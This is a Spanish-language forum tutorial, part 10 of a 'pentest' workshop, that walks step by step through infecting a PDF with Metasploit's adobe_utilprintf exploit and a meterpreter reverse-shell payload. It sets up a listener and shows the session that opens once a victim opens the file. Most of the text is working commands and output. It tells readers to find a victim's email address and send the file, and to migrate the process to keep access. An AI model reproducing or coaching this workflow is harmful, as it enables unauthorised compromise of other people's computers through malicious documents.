[Taller]Pentest S.O. parte X
Publicado: 01 Ago 2010, 01:03
+Temario
-+En que consiste el ataque del lado del cliente
-+Realizando ataque del lado del cliente
-+Creando el archivo .pdf maicioso
-+Escuchando la conexion
-+Capturando la conexion
-Conclusion
- Bueno como ya hemos visto mucho metasploit
y muchas tecnicas del mismo pues bueno mucha
gente me a estado preguntando sobre como podemos
infectar un pdf y eso veremos en esta parte del taller
Es el famoso ataque del lado del cliente
- Bueno esta tecnica consiste en infectar un .pdf
que nosotros querramos con el fin de obtener
acceso a su conputadora ya sea por red local
o por internet....
- Cargamos nuestro msf y despues vamos a
configurar el ataque e infectar nuestri pdf veamos como
Código: Seleccionar todo
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > set FILENAME meteoritos.pdf
FILENAME => meteoritos.pdf
msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf exploit(adobe_utilprintf) > set LPORT 51
LPORT => 51
msf exploit(adobe_utilprintf) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME meteoritos.pdf yes The file name.
OUTPUTPATH /shiva-sheva/metasploit/data/exploits yes The location of the file.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.1.108 yes The local address
LPORT 51 yes The local port
Exploit target:
Id Name
-- ----
0 Adobe Reader v8.1.2 (Windows XP SP3 English)
- Bueno ya configurado todo podemos proceder
a explotar que en este caso sera crear el .pdf
malicioso veamos como ...
Código: Seleccionar todo
msf exploit(adobe_utilprintf) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Creating 'meteoritos.pdf' file...
[*] Generated output file /shiva-sheva/metasploit/data/exploits/meteoritos.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_utilprintf) >
- Buenocomo ya lo vimos el handler nos permite escuchar
conexiones que recibamos y bueno en este caso lo usaremos
de nuevo y lo vamos a configurar para que podamos mandar el .pdf
veamso como ....
Código: Seleccionar todo
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 51
LPORT => 51
msf exploit(handler) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf exploit(handler) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
- Listo tenemos nuestro listener up ahora procedemos a mandar el
.pdf malicioso jejej
Bueno en estos pasos ustedes ingeniencelas para consegir el correo de la victima
yo aconsejo bastante que primero lo practiquen en red local y despues
pasen a algo mas dificil... Bueno supongamos que ya consigieron enviar el
.pdf malicioso
- Bueno si todo salio bien y ejecuto el .pdf malicioso nos saldra algo como esto....
Código: Seleccionar todo
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (718336 bytes)
session[*] Meterpreter session 1 opened (192.168.1.108:51 -> 192.168.1.110:51)
meterpreter >
- Vemos que tenemos muchos metodos efectivos para poder
introducirnos en un sistema jejej ahora consejo que si usan
.pdf migren el proceso rapido para no perder la conexion ok?
Y bueno hasta aqui llegamos ala parte 10 del pentest
apoyandonos en metasploit y en los capitulos que sigen
usaremos una herramienta muy util llamada SET
(Social Enginer Toolkit) Para que vayan leiendo un poco
y nos familiarisemos y bueno nos tomaremos un descanzo
como de una semana para que puedan repasar el taller y
poder continuar saludos a todos!